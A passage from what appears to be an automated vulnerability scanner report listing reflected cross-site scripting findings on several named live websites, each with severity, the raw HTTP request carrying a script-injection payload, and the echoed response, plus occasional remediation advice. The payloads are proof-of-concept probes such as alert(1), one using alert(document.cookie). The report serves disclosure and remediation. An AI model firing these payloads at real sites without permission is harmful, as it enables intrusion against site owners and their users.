Set-Cookie: 1cc6f27e893df95ce1bafcfc9a13f70c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" />
...[SNIP]...

3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=50028f24a02248e8a3ad46b9ac8bedf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 50028f24a02248e8a3ad46b9ac8bedf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' />
...[SNIP]...

3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5ed14ea161c202f343720ca7427c85a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5ed14ea161c202f343720ca7427c85a9=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'tut';
url = "http://www.butterscotch.com/tutorials.html?c73a3"-alert(1)-"3ae1549e395=1";

</script>
...[SNIP]...

3.109. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:44 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: bzid=1296769784292; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: JSESSIONID=C184320DF1036E3FFFE2C9F230AFB45D.furyportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27134

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22&#8221;</title>
...[SNIP]...

3.110. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: bzid=1296769783501; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: JSESSIONID=53936D12D95B3B989389E8D7395B2528.snowbird1portal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26907

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"reviews/610a7<script>alert(1)</script>e398f29f414/x22"</span>
...[SNIP]...

3.111. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:42 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fc455e%27%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2Fc455e%27%3Balert%281%29%2F%2Ffdc072ec141%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: bzid=1296769782702; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: JSESSIONID=3E5B3D0DD9811F0B99BA32EBCB8EA2F2.visionportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26564

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('reviews/c455e';alert(1)//fdc072ec141/x22');</script>
...[SNIP]...

3.112. http://www.ip-adress.com/whois/smartdevil.com/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ip-adress.com
Path:   /whois/smartdevil.com/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44a08'%3b28a34fbd60c was submitted in the REST URL parameter 2. This input was echoed as 44a08';28a34fbd60c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /whois/smartdevil.com44a08'%3b28a34fbd60c/x22 HTTP/1.1
Host: www.ip-adress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:56:51 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Set-Cookie: isv=1; expires=Fri, 04-Feb-2011 21:56:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<span id="hostname">smartdevil.com44a08';28a34fbd60c </' + 'span>
...[SNIP]...

3.113. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4473"%20a%3db%2016a87f4d9f1 was submitted in the REST URL parameter 2. This input was echoed as c4473" a=b 16a87f4d9f1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /find-jobs/All-Locationc4473"%20a%3db%2016a87f4d9f1/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=2d455231d6b3a9382ff7357e54908a71; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:46 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html jobs and career in All Locationc4473" a=b 16a87f4d9f1, displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

3.114. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e162b"%3b450ee9e1714 was submitted in the REST URL parameter 2. This input was echoed as e162b";450ee9e1714 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Locatione162b"%3b450ee9e1714/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=a7d5c6bff03ec5fc507b206bd2f58b86; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:48 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html";
indeed_jobroll_location = "all locatione162b";450ee9e1714";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

3.115. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 636d6"%20a%3db%201c410831e56 was submitted in the REST URL parameter 3. This input was echoed as 636d6" a=b 1c410831e56 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html636d6"%20a%3db%201c410831e56/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=60ddc87c66256906fadd1f2a484abc98; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:04 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html636d6" a=b 1c410831e56 jobs and career , displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

3.116. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11311"%3bb0138398545 was submitted in the REST URL parameter 3. This input was echoed as 11311";b0138398545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html11311"%3bb0138398545/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=7377341cb25663e7e8ec2eb65cf84816; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:06 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html11311";b0138398545";
indeed_jobroll_location = "";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

3.117. http://www.kminek.pl/bsdlicense.txt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /bsdlicense.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73100<script>alert(1)</script>af671aace11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bsdlicense.txt73100<script>alert(1)</script>af671aace11 HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=88d2jmcinjb18m98s7vavegus2; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:00:41 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/bsdlicense.txt73100<script>alert(1)</script>af671aace11</strong>
...[SNIP]...

3.118. http://www.kminek.pl/kminek-css-1271705349.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-css-1271705349.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d399a<script>alert(1)</script>179d88325a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d399a<script>alert(1)</script>179d88325a3 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:03 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:02 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/d399a<script>alert(1)</script>179d88325a3</strong>
...[SNIP]...

3.119. http://www.kminek.pl/kminek-js-1249725108.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-js-1249725108.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee332<script>alert(1)</script>0b6fe74c897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee332<script>alert(1)</script>0b6fe74c897 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:18 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:17 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/ee332<script>alert(1)</script>0b6fe74c897</strong>
...[SNIP]...

3.120. http://www.kminek.pl/lab/yetii/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
